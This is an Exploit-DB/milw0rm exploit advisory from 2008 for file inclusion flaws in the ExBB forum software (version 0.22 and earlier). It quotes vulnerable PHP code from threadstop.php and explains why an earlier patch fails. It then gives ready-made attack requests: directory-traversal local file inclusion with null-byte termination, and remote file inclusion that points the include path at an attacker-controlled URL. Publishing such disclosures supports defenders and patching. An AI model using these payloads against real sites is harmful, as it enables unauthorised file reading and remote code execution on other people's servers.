exbb <= 0.22 - LFI/rfi Multiple Vulnerabilities

2008-04-08T00:00:00
ID EDB-ID:5405
Type exploitdb
Reporter The:Paradox
Modified 2008-04-08T00:00:00

Description

ExBB <= 0.22 (LFI/RFI) Multiple Remote Vulnerabilities. CVE-2008-1861,CVE-2008-1862. Webapps exploit for php platform

                                        
                                            #====================================================================================================#
#                     ____            __________         __             ____  __                     #
#                    /_   | ____     |__\_____  \  _____/  |_          /_   |/  |_                   #
#                     |   |/    \    |  | _(__  &lt;_/ ___\   __\  ______  |   \   __\                  #
#                     |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |                    #
#                     |___|___|  /\__|  /______  /\___  &gt;__|            |___||__|                    #
#                              \/\______|      \/     \/                                             #
#====================================================================================================#
#                                     This is a public Exploit                                       #
#====================================================================================================#
#  	           		            ExBB &lt;= 0.22                                             #
#                         Multiple File Inclusion / Code Execution Vulnerability                     #
#	     	               								             #
#====================================#===============#====================================#==========#
# Server Configuration Requirements  #               # Some Information                   #          #
#====================================#		     #====================================#          #
#                                                    #                                               #
# [RFI]                       [LFI]                  #  Vendor:   exbb.clans.it                      #
#                                                    #  Author:   The:Paradox                        #
# register_globals   = 1      register_globals = 1   #  Severity: Moderately Critical                #
# allow_url_fopen    = 1      magic_quotes_gpc = 0   #                                               #
# allow_url_finculde = 1 			     #  Proud To Be Italian.                         #
#                                                    #                                               #
#====================================#===============#===============================================#
# Proof Of Concept / Bug Explanation #                                                               #
#====================================#                                                               #
# Exbb presents File Inclusion Vulnerabilities. Let's have a look of the source.                     #
#                                                                                                    #
#  /modules/threadstop/threadstop.php                                                                #
#                                                                                                    #
#  1. &lt;?php                                                                                          #
#  2. ################# PATCH by Flippo ######################                                       #
#  3. if ((stristr($_SERVER['QUERY_STRING'], 'exbb[home_path]'))                                     #
#  4. or (stristr($_SERVER['QUERY_STRING'], "exbb['home_path']"))) {                                 #
#  5. die();                                                                                         #
#  6. }                                                                                              #
#  7. ########################################################                                       #
#  8.                                                                                                #
#  9. include($new_exbb[home_path].'modules/threadstop/data/threadstop_data.php');                   #
# 10. include($exbb[home_path].'modules/threadstop/language/'.$exbb[default_lang].'/lang.php');      #
#                                                                                                    #
# The patch of Filippo, is a completely useless code.                                                #
# When Register_Globals is On we can set $new_exbb[home_path] not only via GET variables, but        #
# also via POST and COOKIE.                                                                          #
# Moreover Filippo has forgot to fix $exbb[default_lang] too.                                        #
#                                                                                                    #
# Example:                                                                                           #
#                                                                                                    #
# [LFI]                                                                                              #
#                                                                                                    #
# GET  site.it/Ex/modules/threadstop/threadstop.php?exbb[default_lang]=../../../../../../[File]%00   #
# GET  site.it/Ex/modules/threadstop/threadstop.php?exbb[default_lang]=../../../../../install.php%00 #
#                                                                                                    #
# [RFI]                                                                                              #
#                                                                                                    #
# POST site.it/Ex/modules/threadstop/threadstop.php?  new_exbb[home_path]=http://www.google.it?      #
# POST site.it/Ex/modules/threadstop/threadstop.php?  exbb[home_path]=http://www.yoursite.com/page?  #
#                                                                                                    #
#====================================================================================================#
# Use this at your own risk. You are responsible for your own deeds.                                 #
#====================================================================================================#

# milw0rm.com [2008-04-08]